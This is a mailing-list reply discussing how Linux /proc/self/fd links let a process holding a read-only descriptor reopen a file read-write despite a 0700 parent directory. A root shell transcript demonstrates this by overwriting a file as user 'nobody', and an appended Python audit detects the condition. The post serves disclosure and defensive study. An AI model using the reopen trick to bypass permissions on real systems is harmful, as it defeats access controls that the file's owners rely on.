Re: /proc filesystem allows bypassing directory permissions on Linux



0700 mode from the origin, you would be right, and procfs wouldn't allow
opening files in that directory too, but if you let others traverse
that directory and open your believed-to-be-secure files from the origin,
it's your fault.

I can do the example with fd passing and a 700 directory, but it would
be a lot of C code. Feel free to play; my example was not nearly the
only way to demonstrate it, and no, it was not racy.

Here is an example that shows the behavior where a passed read-only fd
can become read-write by reopening it through /proc, when file
permissions allow it (but directory permissions do not):

$ sudo su
# mkdir -m 0700 /dir
# echo "safe" > /dir/file.txt
# chmod 0666 /dir/file.txt
# ls -al /dir
total 12
drwx------ 2 root root 4096 2009-10-29 00:28 .
drwxr-xr-x 27 root root 4096 2009-10-29 00:28 ..
-rw-rw-rw- 1 root root 7 2009-10-29 00:43 file.txt
# cat /dir/file.txt
safe

Now user "nobody" cannot read or write this file:

# su nobody -c 'cat /dir/file.txt'
sh: /dir/file.txt: Permission denied
# su nobody -c 'echo "hacked" > /dir/file.txt'
sh: /dir/file.txt: Permission denied
# cat /dir/file.txt
safe

If we provide an open read-only file descriptor (as stdin, fd 0), they
can read it:

# su nobody -c 'cat <&0' < /dir/file.txt
safe

But they still can't write to this descriptor:

# su nobody -c 'echo "hacked" >&0' < /dir/file.txt
sh: line 0: echo: write error: Bad file descriptor

Unless we re-open the file using the magic link in /proc:

# su nobody -c 'echo "hacked" >/proc/self/fd/0' < /dir/file.txt
# cat /dir/file.txt
hacked

Again, debatable whether this is a bug, but it's certainly
non-obvious. There is no other way (that I'm aware of) for the "nobody"
user to gain write access to /dir/file.txt, even when given a
read-only fd, without using /proc.

-jim
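As an added example (not part of Jim's post or of anything else in the thread), a Python check that looks at the same situation from the defender's side: given a descriptor a process was handed, it reports whether the fd is read-only and whether the file's own mode bits would let the holder reopen it read-write through /proc/self/fd, which is exactly the gap the transcript above demonstrates. It assumes plain DAC mode bits (no POSIX ACLs, LSM policy or CAP_DAC_OVERRIDE) and a mounted /proc; the file, directory and "safe" contents are constructed in a temp dir.

```python
import fcntl
import os
import stat
import tempfile

def mode_grants_write(st, uid, gids):
    # Classic DAC check on the inode's own mode bits, which is all the kernel
    # consults when /proc/self/fd/N is reopened; the 0700 directory from the
    # transcript is never looked at again. Assumption: plain mode bits only.
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)

def audit_fd(fd, uid=None, gids=None):
    """Return (fd_is_read_only, reopen_rw_possible) for a descriptor this
    process holds, e.g. one inherited as stdin the way "nobody" did above."""
    uid = os.geteuid() if uid is None else uid
    gids = set(os.getgroups()) | {os.getegid()} if gids is None else set(gids)
    st = os.fstat(fd)
    accmode = fcntl.fcntl(fd, fcntl.F_GETFL) & getattr(os, "O_ACCMODE", 3)
    return accmode == os.O_RDONLY, mode_grants_write(st, uid, gids)

def probe_reopen_rw(fd):
    """Confirm the audit the way the thread did: try to reopen the fd for
    writing through its /proc magic link (needs /proc mounted)."""
    try:
        new_fd = os.open(f"/proc/self/fd/{fd}", os.O_WRONLY)
    except PermissionError:
        return False
    os.close(new_fd)
    return True

def demo(file_mode):
    """Constructed scenario: a file with `file_mode` inside a 0700 directory
    (mkdtemp's default), handed to us only as a read-only fd.
    Returns (read_only, audit_says_rw_possible, probe_reopened_rw)."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "file.txt")
        with open(path, "w") as f:
            f.write("safe\n")
        os.chmod(path, file_mode)
        fd = os.open(path, os.O_RDONLY)
        try:
            read_only, rw_possible = audit_fd(fd)
            return read_only, rw_possible, probe_reopen_rw(fd)
        finally:
            os.close(fd)
```

`demo(0o666)` reproduces the transcript (read-only fd, yet reopenable read-write); `demo(0o444)` shows the audit reporting that the file's own bits, not the directory, now stand in the way.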


